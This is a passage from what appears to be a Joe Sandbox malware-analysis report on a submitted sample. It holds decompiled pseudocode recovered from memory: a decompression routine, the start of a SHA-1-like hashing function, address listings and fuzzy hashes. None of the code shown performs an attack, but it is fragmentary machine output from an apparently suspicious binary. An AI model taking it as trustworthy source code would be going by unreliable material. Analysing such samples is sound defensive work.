																	if(_t378 < 0xf) {
																		continue;
																	}
																	goto L125;
																}
																_t676 = _t378;
																goto L125;
															}
															_t556 = 0x10;
															_t645 = _t637 >> _t556 - _t377;
															_t559 = ( *(_t645 + _t520 + 0x2d7c) & 0x000000ff) + _t699[1];
															 *_t699 =  *_t699 + (_t559 >> 3);
															_t560 = _t559 & 0x00000007;
															 *(_t725 + 0x30) =  *_t699;
															_t699[1] = _t560;
															_t383 =  *(_t520 + 0x317c + _t645 * 2) & 0x0000ffff;
															 *(_t725 + 0x34) = _t560;
															goto L126;
														} else {
															goto L116;
														}
														do {
															L116:
															 *_t534 =  *(_t534 - 4);
															_t534 = _t534 - 4;
															_t635 = _t635 - 1;
															__eflags = _t635;
														} while (_t635 != 0);
														goto L117;
													}
													_t681 =  *(_t686 + 0x74);
													_t705 =  *(_t725 + 0x14);
													_t363 =  *(_t725 + 0x18);
													__eflags = _t681;
												}
												_push(_t725 + 0x38);
												_t439 = E00B73F9D(_t686, _t524);
												__eflags = _t439;
												if(_t439 == 0) {
													goto L145;
												}
												_t441 = E00B7253E(_t686, _t725 + 0x38);
												__eflags = _t441;
												if(_t441 == 0) {
													goto L145;
												}
												goto L35;
											}
											_t682 = _t634 - 0x106;
											__eflags = _t682 - 8;
											if(_t682 >= 8) {
												_t444 = (_t682 >> 2) - 1;
												 *(_t725 + 0x34) = _t444;
												_t681 = ((_t682 & 0x00000003 | 0x00000004) << _t444) + 2;
												__eflags = _t444;
												if(_t444 == 0) {
													L39:
													_t445 =  *(_t725 + 0x10);
													L40:
													_t446 = E00B6A89D(_t445);
													_t447 =  *(_t520 + 0xfa0);
													_t651 = _t446 & 0x0000fffe;
													__eflags = _t651 -  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4));
													if(_t651 >=  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4))) {
														_t711 = 0xf;
														_t448 = _t447 + 1;
														 *(_t725 + 0x28) = _t711;
														__eflags = _t448 - _t711;
														if(_t448 >= _t711) {
															L50:
															_t569 =  *(_t725 + 0x10);
															_t713 = _t569[1] +  *(_t725 + 0x2c);
															_t714 = _t713 & 0x00000007;
															 *_t569 =  *_t569 + (_t713 >> 3);
															 *(_t725 + 0x24) =  *_t569;
															_t452 =  *(_t725 + 0x2c);
															_t569[1] = _t714;
															_t570 = 0x10;
															 *(_t725 + 0x1c) = _t714;
															_t573 =  *((intOrPtr*)(_t520 + 0xf60 + _t452 * 4)) + (_t651 -  *((intOrPtr*)(_t520 + 0xf1c + _t452 * 4)) >> _t570 - _t452);
															__eflags = _t573 -  *((intOrPtr*)(_t520 + 0xf1c));
															asm("sbb eax, eax");
															_t453 = _t452 & _t573;
															__eflags = _t453;
															_t454 =  *(_t520 + 0x1ba4 + _t453 * 2) & 0x0000ffff;
															L51:
															_t654 = _t454 & 0x0000ffff;
															__eflags = _t654 - 4;
															if(_t654 >= 4) {
																_t457 = (_t654 >> 1) - 1;
																 *(_t725 + 0x30) = _t457;
																_t575 = ((_t654 & 0x00000001 | 0x00000002) << _t457) + 1;
																 *(_t725 + 0x34) = _t575;
																_t715 = _t575;
																 *(_t725 + 0x28) = _t715;
																__eflags = _t457;
																if(_t457 == 0) {
																	L70:
																	__eflags = _t715 - 0x100;
																	if(_t715 > 0x100) {
																		_t681 = _t681 + 1;
																		__eflags = _t715 - 0x2000;
																		if(_t715 > 0x2000) {
																			_t681 = _t681 + 1;
																			__eflags = _t715 - 0x40000;
																			if(_t715 > 0x40000) {
																				_t681 = _t681 + 1;
																				__eflags = _t681;
																			}
																		}
																	}
																	 *(_t686 + 0x6c) =  *(_t686 + 0x68);
																	 *(_t686 + 0x68) =  *(_t686 + 0x64);
																	 *(_t686 + 0x64) =  *(_t686 + 0x60);
																	 *(_t686 + 0x60) = _t715;
																	_t658 =  *(_t686 + 0x7c);
																	_t577 = _t658 - _t715;
																	_t462 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	 *(_t686 + 0x74) = _t681;
																	 *(_t725 + 0x34) = _t577;
																	__eflags = _t577 - _t462;
																	if(_t577 >= _t462) {
																		goto L92;
																	} else {
																		__eflags = _t658 - _t462;
																		if(_t658 >= _t462) {
																			goto L92;
																		}
																		_t466 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t710 = _t466 + _t658;
																		_t521 = _t466 + _t577;
																		_t661 = 8;
																		 *(_t686 + 0x7c) = _t658 + _t681;
																		__eflags = _t681 - _t661;
																		if(_t681 < _t661) {
																			goto L84;
																		}
																		__eflags =  *(_t725 + 0x28) - _t681;
																		if( *(_t725 + 0x28) >= _t681) {
																			_t469 = _t681 >> 3;
																			__eflags = _t469;
																			 *(_t725 + 0x34) = _t469;
																			_t689 = _t469;
																			do {
																				E00B80320(_t710, _t521, _t661);
																				_t725 = _t725 + 0xc;
																				_t661 = 8;
																				_t521 = _t521 + _t661;
																				_t710 = _t710 + _t661;
																				_t681 = _t681 - _t661;
																				_t689 = _t689 - 1;
																				__eflags = _t689;
																			} while (_t689 != 0);
																			goto L83;
																		}
																		_t580 = _t681 >> 3;
																		__eflags = _t580;
																		do {
																			_t681 = _t681 - _t661;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t478 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t661;
																			 *((char*)(_t710 + 7)) = _t478;
																			_t710 = _t710 + _t661;
																			_t580 = _t580 - 1;
																			__eflags = _t580;
																		} while (_t580 != 0);
																		goto L84;
																	}
																}
																__eflags = _t457 - 4;
																if(__eflags < 0) {
																	_t479 = E00B78934( *(_t725 + 0x10));
																	_t662 =  *(_t725 + 0x10);
																	_t582 = 0x20;
																	_t585 =  *(_t725 + 0x1c) +  *(_t725 + 0x30);
																	_t715 = (_t479 >> _t582 -  *(_t725 + 0x30)) +  *(_t725 + 0x34);
																	_t586 = _t585 & 0x00000007;
																	__eflags = _t586;
																	 *_t662 = (_t585 >> 3) +  *(_t725 + 0x20);
																	_t662[1] = _t586;
																	L69:
																	 *(_t725 + 0x28) = _t715;
																	goto L70;
																}
																if(__eflags <= 0) {
																	_t483 =  *(_t725 + 0x10);
																} else {
																	_t499 = E00B78934( *(_t725 + 0x10));
																	_t500 =  *(_t725 + 0x30);
																	_t604 = 0x24;
																	_t607 =  *(_t725 + 0x1c) + _t500 + 0xfffffffc;
																	_t715 = (_t499 >> _t604 - _t500 << 4) +  *(_t725 + 0x34);
																	_t669 =  *(_t725 + 0x20) + (_t607 >> 3);
																	_t483 =  *(_t725 + 0x10);
																	_t608 = _t607 & 0x00000007;
																	 *(_t725 + 0x20) = _t669;
																	 *(_t725 + 0x1c) = _t608;
																	 *_t483 = _t669;
																	_t483[1] = _t608;
																}
																_t484 = E00B6A89D(_t483);
																_t485 =  *(_t520 + 0x1e8c);
																_t664 = _t484 & 0x0000fffe;
																__eflags = _t664 -  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4));
																if(_t664 >=  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4))) {
																	_t588 = 0xf;
																	_t486 = _t485 + 1;
																	 *(_t725 + 0x28) = _t588;
																	__eflags = _t486 - _t588;
																	if(_t486 >= _t588) {
																		L66:
																		_t690 =  *(_t725 + 0x10);
																		_t590 = ( *(_t725 + 0x10))[1] +  *(_t725 + 0x2c);
																		 *_t690 =  *_t690 + (_t590 >> 3);
																		_t690[1] = _t590 & 0x00000007;
																		_t491 =  *(_t725 + 0x2c);
																		_t592 = 0x10;
																		_t595 =  *((intOrPtr*)(_t520 + 0x1e4c + _t491 * 4)) + (_t664 -  *((intOrPtr*)(_t520 + 0x1e08 + _t491 * 4)) >> _t592 - _t491);
																		__eflags = _t595 -  *((intOrPtr*)(_t520 + 0x1e08));
																		asm("sbb eax, eax");
																		_t492 = _t491 & _t595;
																		__eflags = _t492;
																		_t493 =  *(_t520 + 0x2a90 + _t492 * 2) & 0x0000ffff;
																		goto L67;
																	}
																	_t597 = _t520 + (_t486 + 0x783) * 4;
																	while(1) {
																		__eflags = _t664 -  *_t597;
																		if(_t664 <  *_t597) {
																			break;
																		}
																		_t486 = _t486 + 1;
																		_t597 = _t597 + 4;
																		__eflags = _t486 - 0xf;
																		if(_t486 < 0xf) {
																			continue;
																		}
																		goto L66;
																	}
																	 *(_t725 + 0x28) = _t486;
																	goto L66;
																} else {
																	_t691 =  *(_t725 + 0x10);
																	_t598 = 0x10;
																	_t667 = _t664 >> _t598 - _t485;
																	_t601 = ( *(_t667 + _t520 + 0x1e90) & 0x000000ff) +  *(_t725 + 0x1c);
																	 *_t691 = (_t601 >> 3) +  *(_t725 + 0x20);
																	_t691[1] = _t601 & 0x00000007;
																	_t493 =  *(_t520 + 0x2290 + _t667 * 2) & 0x0000ffff;
																	L67:
																	_t686 =  *(_t725 + 0x24);
																	_t715 = _t715 + (_t493 & 0x0000ffff);
																	goto L69;
																}
															}
															_t715 = _t654 + 1;
															goto L69;
														}
														_t610 = _t520 + (_t448 + 0x3c8) * 4;
														while(1) {
															__eflags = _t651 -  *_t610;
															if(_t651 <  *_t610) {
																break;
															}
															_t448 = _t448 + 1;
															_t610 = _t610 + 4;
															__eflags = _t448 - _t711;
															if(_t448 < _t711) {
																continue;
															}
															goto L50;
														}
														 *(_t725 + 0x28) = _t448;
														goto L50;
													}
													_t611 = 0x10;
													_t670 = _t651 >> _t611 - _t447;
													_t614 = ( *(_t670 + _t520 + 0xfa4) & 0x000000ff) + _t697;
													_t723 =  *(_t725 + 0x1c) + (_t614 >> 3);
													_t506 =  *(_t725 + 0x10);
													_t615 = _t614 & 0x00000007;
													 *(_t725 + 0x20) = _t723;
													 *(_t725 + 0x1c) = _t615;
													 *_t506 = _t723;
													_t506[1] = _t615;
													_t454 =  *(_t520 + 0x13a4 + _t670 * 2) & 0x0000ffff;
													goto L51;
												}
												_t507 = E00B6A89D( *(_t725 + 0x10));
												_t724 = _t697 +  *(_t725 + 0x34);
												_t617 = 0x10;
												_t681 = _t681 + (_t507 >> _t617 -  *(_t725 + 0x34));
												_t620 =  *(_t725 + 0x1c) + (_t724 >> 3);
												_t445 =  *(_t725 + 0x10);
												_t697 = _t724 & 0x00000007;
												 *(_t725 + 0x1c) = _t620;
												 *_t445 = _t620;
												_t445[1] = _t697;
												goto L40;
											}
											 *(_t725 + 0x1c) = _t375;
											_t681 = _t682 + 2;
											__eflags = _t681;
											goto L39;
										}
										 *( *((intOrPtr*)(_t686 + 0x4b40)) +  *(_t686 + 0x7c)) = _t634;
										_t72 = _t686 + 0x7c;
										 *_t72 =  *(_t686 + 0x7c) + 1;
										__eflags =  *_t72;
										goto L35;
									}
									_t623 = _t520 + (_t369 + 0xd) * 4;
									while(1) {
										__eflags = _t630 -  *_t623;
										if(_t630 <  *_t623) {
											break;
										}
										_t369 = _t369 + 1;
										_t623 = _t623 + 4;
										__eflags = _t369 - 0xf;
										if(_t369 < 0xf) {
											continue;
										}
										_t528 =  *(_t725 + 0x28);
										goto L32;
									}
									_t528 = _t369;
									 *(_t725 + 0x28) = _t369;
									goto L32;
								}
								_t624 = 0x10;
								_t671 = _t630 >> _t624 - _t368;
								_t524 = _t674;
								_t707 = ( *(_t671 + _t520 + 0xb8) & 0x000000ff) + _t524[1];
								 *_t524 =  *_t524 + (_t707 >> 3);
								_t697 = _t707 & 0x00000007;
								_t375 =  *_t524;
								_t524[1] = _t697;
								_t633 =  *(_t520 + 0x4b8 + _t671 * 2) & 0x0000ffff;
								 *(_t725 + 0x1c) = _t375;
								goto L33;
							}
							__eflags = _t526 - _t628;
							if(_t526 == _t628) {
								goto L24;
							}
							E00B75202(_t686);
							__eflags =  *((intOrPtr*)(_t686 + 0x4c5c)) -  *((intOrPtr*)(_t686 + 0x4c4c));
							if(__eflags > 0) {
								L6:
								return 0;
							}
							if(__eflags < 0) {
								goto L24;
							}
							__eflags =  *((intOrPtr*)(_t686 + 0x4c58)) -  *((intOrPtr*)(_t686 + 0x4c48));
							if( *((intOrPtr*)(_t686 + 0x4c58)) >  *((intOrPtr*)(_t686 + 0x4c48))) {
								goto L6;
							}
							goto L24;
						}
					}
					L5:
					 *((char*)(_t520 + 0x4ad0)) = 1;
					goto L6;
				}
				 *((char*)(_t520 + 0x2c)) = 1;
				_push(_t520 + 0x30);
				_push(_t672);
				_push(_t692);
				if(E00B743BF(__ecx) == 0) {
					goto L5;
				} else {
					goto L4;
				}
			}

0x00b777f3
0x00b777f9
0x00b777ff
0x00b77803
0x00b77807
0x00b7780a
0x00b7780e
0x00b77825
0x00b77829
0x00b7782c
0x00b77833
0x00b7784d
0x00b7784f
0x00b77852
0x00b77856
0x00b7785a
0x00b7785e
0x00b77860
0x00b77862
0x00b77862
0x00b77866
0x00b77874
0x00b77877
0x00b7787d
0x00b7787f
0x00b77882
0x00b77884
0x00b77888
0x00000000
0x00000000
0x00b7788a
0x00b7788a
0x00b7788c
0x00b781e3
0x00000000
0x00b781e3
0x00b77892
0x00b778a0
0x00b778a0
0x00b778a2
0x00b778b1
0x00b778b1
0x00b778b7
0x00b781dc
0x00b781dc
0x00000000
0x00b781dc
0x00000000
0x00b778b7
0x00b778a4
0x00b778ab
0x00000000
0x00000000
0x00000000
0x00b778ab
0x00b77897
0x00b7789a
0x00000000
0x00000000
0x00000000
0x00b778bd
0x00b778bd
0x00b778c9
0x00b778ce
0x00b77901
0x00b77901
0x00b77907
0x00b7790e
0x00b77914
0x00b7791a
0x00b7791e
0x00b77953
0x00b77954
0x00b77955
0x00b77959
0x00b7795b
0x00b7797c
0x00b7797f
0x00b77983
0x00b77989
0x00b7798d
0x00b77991
0x00b77995
0x00b7799a
0x00b779a7
0x00b779a9
0x00b779ac
0x00b779ae
0x00b779ae
0x00b779b0
0x00b779b4
0x00b779bc
0x00b779c0
0x00b779c0
0x00b779c8
0x00b779ca
0x00b779e8
0x00b779ee
0x00b77e80
0x00b77e82
0x00b77eb2
0x00b77eb8
0x00b77fb2
0x00b77fb2
0x00b77fbb
0x00b77fbe
0x00b77fc0
0x00b77fc4
0x00b77fd3
0x00b77fd3
0x00b77fd6
0x00b77fdc
0x00b77fe3
0x00b77fe9
0x00b77fef
0x00b77ff6
0x00b7802f
0x00b78030
0x00b78031
0x00b78033
0x00b7804f
0x00b78052
0x00b78056
0x00b78059
0x00b7805f
0x00b78069
0x00b7806c
0x00b78072
0x00b78075
0x00b78082
0x00b78084
0x00b7808a
0x00b7808c
0x00b7808c
0x00b7808e
0x00b78096
0x00b78096
0x00b78099
0x00b7809c
0x00b780ae
0x00b780b3
0x00b780b6
0x00b780b8
0x00b780be
0x00b780c3
0x00b780c9
0x00b780d2
0x00b780d4
0x00b780df
0x00b780df
0x00b780e2
0x00b780e4
0x00b780e4
0x00b7809e
0x00b7809e
0x00b7809e
0x00b780e7
0x00b780f2
0x00b780f6
0x00b780fb
0x00b780fd
0x00b78100
0x00b78102
0x00b7819e
0x00b7819e
0x00b781a2
0x00b781a6
0x00b781a8
0x00000000
0x00000000
0x00b781ae
0x00b781b4
0x00b781ba
0x00b781bc
0x00b781c0
0x00b781c6
0x00b781cd
0x00b781cf
0x00b781d2
0x00b781d2
0x00b781d2
0x00000000
0x00b78108
0x00b78108
0x00b7810a
0x00000000
0x00000000
0x00b78110
0x00b78118
0x00b7811b
0x00b78121
0x00b78122
0x00b78125
0x00b78127
0x00b77daa
0x00b77daa
0x00b77dae
0x00b77db2
0x00b77db4
0x00b7786c
0x00b7786c
0x00b77870
0x00b77870
0x00b77870
0x00b77874
0x00b77874
0x00b77877
0x00b7787d
0x00b7787f
0x00b77882
0x00b77884
0x00b77888
0x00000000
0x00000000
0x00000000
0x00b77888
0x00b77ed1
0x00b77edc
0x00b77edf
0x00b77ee4
0x00b77ee6
0x00b77ee8
0x00b77f84
0x00b77f84
0x00b77f8a
0x00b77f90
0x00b77f92
0x00b77f96
0x00b77f9c
0x00b77fa3
0x00b77fa5
0x00b77fa8
0x00b77fa8
0x00b77fa8
0x00b779db
0x00b779db
0x00b779df
0x00000000
0x00b779df
0x00b77eee
0x00b77ef0
0x00000000
0x00000000
0x00b77ef6
0x00b77efe
0x00b77f01
0x00b77f07
0x00b77f08
0x00b77f0b
0x00b77f0d
0x00000000
0x00000000
0x00b77f13
0x00b77f15
0x00b77f5d
0x00b77f5d
0x00b77f60
0x00b77f64
0x00b77f66
0x00b77f69
0x00b77f6e
0x00b77f73
0x00b77f74
0x00b77f76
0x00b77f78
0x00b77f7a
0x00b77f7a
0x00b77f7a
0x00b77da6
0x00b77da6
0x00000000
0x00b77da6
0x00b77f19
0x00b77f19
0x00b77f1c
0x00b77f1e
0x00b77f20
0x00b77f26
0x00b77f2c
0x00b77f32
0x00b77f38
0x00b77f3e
0x00b77f44
0x00b77f47
0x00b77f4a
0x00b77f4c
0x00b77f4f
0x00b77f51
0x00b77f51
0x00b77f51
0x00000000
0x00b77e3a
0x00b77e3a
0x00b77e3e
0x00b77e42
0x00b77e46
0x00b77e46
0x00b77e4e
0x00b77e54
0x00b77e58
0x00b77e5e
0x00b77e60
0x00b77e64
0x00b77e6a
0x00b77e71
0x00b77e73
0x00b77e76
0x00b77e76
0x00b77e76
0x00000000
0x00b77e7b
0x00b77dbc
0x00b77dbf
0x00b77dc3
0x00b77dc6
0x00000000
0x00000000
0x00b77dcf
0x00b77dd2
0x00b77dd6
0x00b77dd9
0x00000000
0x00000000
0x00b77de2
0x00b77de5
0x00b77de9
0x00b77dec
0x00000000
0x00000000
0x00b77df5
0x00b77df8
0x00b77dfc
0x00b77dff
0x00000000
0x00000000
0x00b77e08
0x00b77e0b
0x00b77e0f
0x00b77e12
0x00000000
0x00000000
0x00b77e1b
0x00b77e1e
0x00b77e22
0x00b77e25
0x00000000
0x00000000
0x00b77e2e
0x00b77e32
0x00000000
0x00b77e32
0x00b7812d
0x00b7812f
0x00b78177
0x00b78177
0x00b7817a
0x00b7817e
0x00b78180
0x00b78183
0x00b78188
0x00b7818d
0x00b7818e
0x00b78190
0x00b78192
0x00b78194
0x00b78194
0x00b78194
0x00000000
0x00b78199
0x00b78133
0x00b78133
0x00b78136
0x00b78138
0x00b7813a
0x00b78140
0x00b78146
0x00b7814c
0x00b78152
0x00b78158
0x00b7815e
0x00b78161
0x00b78164
0x00b78166
0x00b78169
0x00b7816b
0x00b7816b
0x00b7816b
0x00000000
0x00b78170
0x00b78102
0x00b7803b
0x00b7803e
0x00b7803e
0x00b78040
0x00000000
0x00000000
0x00b78042
0x00b78043
0x00b78046
0x00b78049
0x00000000
0x00000000
0x00000000
0x00b7804b
0x00b7804d
0x00000000
0x00b7804d
0x00b77ffa
0x00b77ffd
0x00b78007
0x00b7800f
0x00b78012
0x00b78018
0x00b7801c
0x00b7801f
0x00b78027
0x00000000
0x00000000
0x00000000
0x00000000
0x00b77fc6
0x00b77fc6
0x00b77fc9
0x00b77fcb
0x00b77fce
0x00b77fce
0x00b77fce
0x00000000
0x00b77fc6
0x00b77ebe
0x00b77ec1
0x00b77ec5
0x00b77ec9
0x00b77ec9
0x00b77e88
0x00b77e8c
0x00b77e91
0x00b77e93
0x00000000
0x00000000
0x00b77ea0
0x00b77ea5
0x00b77ea7
0x00000000
0x00000000
0x00000000
0x00b77ead
0x00b779f4
0x00b779fa
0x00b779fd
0x00b77a74
0x00b77a77
0x00b77a7d
0x00b77a80
0x00b77a82
0x00b77a06
0x00b77a06
0x00b77a0a
0x00b77a0c
0x00b77a13
0x00b77a19
0x00b77a1f
0x00b77a26
0x00b77abe
0x00b77abf
0x00b77ac0
0x00b77ac4
0x00b77ac6
0x00b77ae3
0x00b77ae3
0x00b77aec
0x00b77af2
0x00b77af8
0x00b77afc
0x00b77b00
0x00b77b04
0x00b77b07
0x00b77b0a
0x00b77b1e
0x00b77b20
0x00b77b26
0x00b77b28
0x00b77b28
0x00b77b2a
0x00b77b32
0x00b77b32
0x00b77b35
0x00b77b38
0x00b77b4c
0x00b77b4f
0x00b77b55
0x00b77b58
0x00b77b5c
0x00b77b5e
0x00b77b62
0x00b77b64
0x00b77cc9
0x00b77cc9
0x00b77ccf
0x00b77cd1
0x00b77cd2
0x00b77cd8
0x00b77cda
0x00b77cdb
0x00b77ce1
0x00b77ce3
0x00b77ce3
0x00b77ce3
0x00b77ce1
0x00b77cd8
0x00b77ce7
0x00b77ced
0x00b77cf3
0x00b77cf6
0x00b77cf9
0x00b77d04
0x00b77d06
0x00b77d0b
0x00b77d0e
0x00b77d12
0x00b77d14
0x00000000
0x00b77d1a
0x00b77d1a
0x00b77d1c
0x00000000
0x00000000
0x00b77d22
0x00b77d2a
0x00b77d2d
0x00b77d33
0x00b77d34
0x00b77d37
0x00b77d39
0x00000000
0x00000000
0x00b77d3b
0x00b77d3f
0x00b77d84
0x00b77d84
0x00b77d87
0x00b77d8b
0x00b77d8d
0x00b77d90
0x00b77d95
0x00b77d9a
0x00b77d9b
0x00b77d9d
0x00b77d9f
0x00b77da1
0x00b77da1
0x00b77da1
0x00000000
0x00b77d8d
0x00b77d43
0x00b77d43
0x00b77d46
0x00b77d48
0x00b77d4a
0x00b77d50
0x00b77d56
0x00b77d5c
0x00b77d62
0x00b77d68
0x00b77d6e
0x00b77d71
0x00b77d74
0x00b77d76
0x00b77d79
0x00b77d7b
0x00b77d7b
0x00b77d7b
0x00000000
0x00b77d80
0x00b77d14
0x00b77b6a
0x00b77b6d
0x00b77c94
0x00b77c99
0x00b77ca1
0x00b77cac
0x00b77cb0
0x00b77cbd
0x00b77cbd
0x00b77cc0
0x00b77cc2
0x00b77cc5
0x00b77cc5
0x00000000
0x00b77cc5
0x00b77b73
0x00b77bbc
0x00b77b75
0x00b77b79
0x00b77b84
0x00b77b8a
0x00b77b96
0x00b77b9b
0x00b77ba4
0x00b77ba6
0x00b77baa
0x00b77bad
0x00b77bb1
0x00b77bb5
0x00b77bb7
0x00b77bb7
0x00b77bc2
0x00b77bc9
0x00b77bcf
0x00b77bd5
0x00b77bdc
0x00b77c14
0x00b77c15
0x00b77c16
0x00b77c1a
0x00b77c1c
0x00b77c3a
0x00b77c3e
0x00b77c47
0x00b77c53
0x00b77c57
0x00b77c5a
0x00b77c5e
0x00b77c71
0x00b77c73
0x00b77c79
0x00b77c7b
0x00b77c7b
0x00b77c7d
0x00000000
0x00b77c7d
0x00b77c24
0x00b77c27
0x00b77c27
0x00b77c29
0x00000000
0x00000000
0x00b77c2b
0x00b77c2c
0x00b77c2f
0x00b77c32
0x00000000
0x00000000
0x00000000
0x00b77c34
0x00b77c36
0x00000000
0x00b77bde
0x00b77bde
0x00b77be4
0x00b77be7
0x00b77bf1
0x00b77c01
0x00b77c05
0x00b77c08
0x00b77c85
0x00b77c85
0x00b77c8c
0x00000000
0x00b77c8c
0x00b77bdc
0x00b77b3a
0x00000000
0x00b77b3a
0x00b77ace
0x00b77ad1
0x00b77ad1
0x00b77ad3
0x00000000
0x00000000
0x00b77ad5
0x00b77ad6
0x00b77ad9
0x00b77adb
0x00000000
0x00000000
0x00000000
0x00b77add
0x00b77adf
0x00000000
0x00b77adf
0x00b77a2e
0x00b77a31
0x00b77a3b
0x00b77a46
0x00b77a48
0x00b77a4c
0x00b77a4f
0x00b77a53
0x00b77a57
0x00b77a59
0x00b77a5c
0x00000000
0x00b77a5c
0x00b77a88
0x00b77a8d
0x00b77a93
0x00b77a9e
0x00b77aa5
0x00b77aa7
0x00b77aab
0x00b77aae
0x00b77ab2
0x00b77ab4
0x00000000
0x00b77ab4
0x00b779ff
0x00b77a03
0x00b77a03
0x00000000
0x00b77a03
0x00b779d5
0x00b779d8
0x00b779d8
0x00b779d8
0x00000000
0x00b779d8
0x00b77960
0x00b77963
0x00b77963
0x00b77965
0x00000000
0x00000000
0x00b77967
0x00b77968
0x00b7796b
0x00b7796e
0x00000000
0x00000000
0x00b77970
0x00000000
0x00b77970
0x00b77976
0x00b77978
0x00000000
0x00b77978
0x00b77922
0x00b77925
0x00b77927
0x00b77931
0x00b77939
0x00b7793b
0x00b7793e
0x00b77940
0x00b77943
0x00b7794b
0x00000000
0x00b7794b
0x00b778d0
0x00b778d2
0x00000000
0x00000000
0x00b778d6
0x00b778e1
0x00b778e7
0x00b7783c
0x00000000
0x00b7783c
0x00b778ed
0x00000000
0x00000000
0x00b778f5
0x00b778fb
0x00000000
0x00000000
0x00000000
0x00b778fb
0x00b77874
0x00b77835
0x00b77835
0x00000000
0x00b77835
0x00b77813
0x00b77817
0x00b77818
0x00b77819
0x00b77821
0x00000000
0x00b77823
0x00000000
0x00b77823

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: 07297fdee9f56aba5acabeb478d8dd0a784b665bacf12ccbbb0b8cd3b4e77211
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction Fuzzy Hash: 6062E7716483858FCB15CF28C8805B9BBE1FF99304F18C5ADE9AA8B346DB30E945CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F461 Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00B6F461(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t434;
				intOrPtr _t436;
				intOrPtr _t441;
				void* _t446;
				intOrPtr _t448;
				signed int _t451;
				void* _t453;
				signed int _t459;
				signed int _t465;
				signed int _t471;
				signed int _t478;
				signed int _t481;
				signed int _t488;
				signed int _t511;
				signed int _t518;
				signed int _t525;
				signed int _t545;
				signed int _t554;
				signed int _t563;
				signed int* _t591;
				signed int _t592;
				signed int _t596;
				signed int _t599;
				signed int _t600;
				signed int* _t601;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				signed int _t607;
				signed int* _t608;
				signed int _t609;
				signed int* _t675;
				signed int* _t746;
				signed int _t757;
				signed int _t774;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t787;
				signed int _t788;
				signed int _t792;
				signed int _t797;
				signed int _t801;
				signed int _t805;
				signed int _t807;
				signed int _t810;
				signed int* _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t821;
				signed int _t822;
				signed int _t826;
				signed int _t831;
				signed int _t835;
				signed int _t839;
				signed int* _t840;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t846;
				signed int _t847;
				signed int _t849;
				signed int* _t850;
				signed int _t853;
				signed int _t857;
				signed int _t858;
				signed int* _t862;
				signed int _t863;
				signed int _t865;
				signed int _t866;
				signed int _t870;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t883;
				signed int _t887;
				signed int _t888;
				signed int* _t889;
				signed int _t890;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int _t899;
				signed int _t900;
				signed int _t902;
				signed int _t903;
				signed int* _t904;
				signed int _t905;
				signed int _t907;
				signed int _t908;
				signed int _t910;
				signed int _t911;

				_t912 =  &_v40;
				if(_a16 == 0) {
					_t840 = _a8;
					_v20 = _t840;
					E00B80320(_t840, _a12, 0x40);
					_t912 =  &(( &_v40)[3]);
				} else {
					_t840 = _a12;
					_v20 = _t840;
				}
				_t850 = _a4;
				_t592 = _t850[1];
				_t894 =  *_t850;
				_v28 = _t850[2];
				_v24 = _t850[3];
				_v32 = _t592;
				_v36 = 0;
				_t434 = E00B868E4( *_t840);
				asm("rol edx, 0x5");
				 *_t840 = _t434;
				_t435 = _t840;
				_t596 = (_t592 & (_v24 ^ _v28) ^ _v24) + _t894 + _t434 + _t850[4] + 0x5a827999;
				_v16 = _t840;
				_t853 = _v32;
				asm("ror esi, 0x2");
				_v32 =  &(_t840[3]);
				do {
					_t436 = E00B868E4(_t435[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t436;
					asm("ror ebp, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_v28 ^ _t853) & _t894 ^ _v28) + _t596 + _t436;
					_t441 = E00B868E4( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t441;
					asm("ror ebx, 0x2");
